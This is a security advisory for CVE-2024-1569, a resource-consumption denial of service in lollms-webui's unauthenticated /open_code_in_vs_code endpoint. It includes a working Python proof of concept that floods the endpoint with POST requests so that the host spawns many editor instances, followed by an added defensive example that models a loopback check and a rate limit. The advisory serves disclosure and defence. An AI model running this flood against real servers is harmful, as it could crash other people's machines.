JFrog Security Research

JFSA-2024-001028813 - lollms-webui resource consumption DoS

CVE-2024-1569 | CVSS 5.3

JFrog Severity: medium

Discovered by Naveh Racovsky of the JFrog Security Research Team

Published 15 Apr, 2024 | Last updated 15 Apr, 2024

Unrestricted resource consumption in lollms-webui leads to denial of service

parisneo/lollms-webui

Affected versions (,9.1], fixed in 9.2

The /open_code_in_vs_code endpoint is reachable over the network without any authentication when the application is exposed to the network (for example, when it is started with --host 0.0.0.0). This can lead to a denial of service that can crash the entire host machine. The attack consists of repeatedly sending HTTP POST requests to the /open_code_in_vs_code path: each request causes the server to launch Visual Studio Code, so the repeated launches consume resources outside the web application itself and affect the whole machine, not just the lollms-webui process. Other endpoints are open to similar attacks and may be exploited in the same way.

# PoC.py
# Floods the unauthenticated /open_code_in_vs_code endpoint; every accepted
# request makes the vulnerable server spawn a new Visual Studio Code instance.
import requests

IP_ADDRESS = "aaa.bbb.ccc.ddd"  # address of the exposed lollms-webui instance
PORT = 9600                     # lollms-webui default port

for i in range(1000):
    # The endpoint only checks for the presence of these fields; their
    # values do not matter for the attack.
    data = {
        "code": "a",
        "discussion_id": f"{i}",
        "message_id": f"{i}",
    }
    response = requests.post(f"http://{IP_ADDRESS}:{PORT}/open_code_in_vs_code", json=data)
    print(i, response.json())
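The root cause is an endpoint with a host-side side effect (spawning a program) that is served to any network peer, with no bound on how often it can be triggered. The following is an added example, not code from lollms-webui and not the project's actual 9.2 fix: it models a guarded version of the same handler in plain Python (framework-free, with the real editor launch replaced by an injected callable) and replays the PoC loop above against it. The names EditorLaunchGuard, handle_open_code_in_vs_code and simulate_flood, the rate-limit parameters and the payload field names used for validation are assumptions made for the illustration.

```python
# Added example (not lollms-webui's own code): a guard for a "launch a local
# program" endpoint, showing the two properties that the endpoint abused in
# CVE-2024-1569 lacked: it is only served to loopback peers, and the number of
# launches a single peer can trigger is bounded.
import ipaddress
import time
from collections import defaultdict, deque


def _is_loopback(addr):
    """True for 'localhost', 127.0.0.0/8 and ::1; False for anything else."""
    if addr == "localhost":
        return True
    try:
        return ipaddress.ip_address(addr).is_loopback
    except ValueError:
        return False


class EditorLaunchGuard:
    """Decides whether a request may trigger a host-side program launch.

    Both checks are assumptions about a sane design, not the project's fix:
      1. The feature is refused when the server is bound to a non-loopback
         address, and refused per request when the peer is not loopback.
      2. Launches are rate-limited per peer, so even a local caller cannot
         spawn an unbounded number of editor processes.
    """

    def __init__(self, bind_host, max_launches=3, window_seconds=60.0,
                 clock=time.monotonic):
        self.bind_host = bind_host
        self.max_launches = max_launches
        self.window = window_seconds
        self.clock = clock
        self._history = defaultdict(deque)  # peer -> timestamps of allowed launches

    def decide(self, client_ip):
        """Return (allowed, reason) for one request from client_ip."""
        if not _is_loopback(self.bind_host):
            return False, "feature disabled: server is bound to a non-loopback address"
        if not _is_loopback(client_ip):
            return False, "forbidden: peer is not loopback"
        now = self.clock()
        hist = self._history[client_ip]
        while hist and now - hist[0] > self.window:  # drop launches outside the window
            hist.popleft()
        if len(hist) >= self.max_launches:
            return False, "rate limited: too many editor launches in window"
        hist.append(now)
        return True, "ok"


REQUIRED_FIELDS = ("code", "discussion_id", "message_id")  # assumed request schema


def handle_open_code_in_vs_code(guard, client_ip, payload, launcher):
    """Guarded handler. `launcher` is whatever would really start the editor
    (e.g. subprocess.Popen(["code", path])); it is injected so the example runs
    offline and so the number of launches can be counted."""
    missing = [f for f in REQUIRED_FIELDS if f not in payload]
    if missing:
        return {"status": False, "error": f"missing fields: {missing}"}
    allowed, reason = guard.decide(client_ip)
    if not allowed:
        return {"status": False, "error": reason}
    launcher(payload["code"])
    return {"status": True}


def simulate_flood(bind_host, client_ip, requests=1000):
    """Replay the advisory's PoC loop against the guarded handler and return
    how many editor launches actually happened."""
    launches = []
    # Fixed clock: every request falls inside one window, like the PoC loop.
    guard = EditorLaunchGuard(bind_host, clock=lambda: 0.0)
    for i in range(requests):
        body = {"code": "a", "discussion_id": str(i), "message_id": str(i)}
        handle_open_code_in_vs_code(guard, client_ip, body, launches.append)
    return len(launches)


if __name__ == "__main__":
    print("bound to 0.0.0.0, remote peer:  ", simulate_flood("0.0.0.0", "10.0.0.5"))
    print("bound to loopback, remote peer: ", simulate_flood("127.0.0.1", "10.0.0.5"))
    print("bound to loopback, local peer:  ", simulate_flood("127.0.0.1", "127.0.0.1"))
```

With the guard in place, the 1000-request flood from the PoC produces no launches at all when the server is exposed or the peer is remote, and at most max_launches launches per window for a local caller. The bind-address check is the important one for this advisory: a feature that acts on the host should simply not exist when the server is reachable from the network.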

No mitigations are supplied for this issue
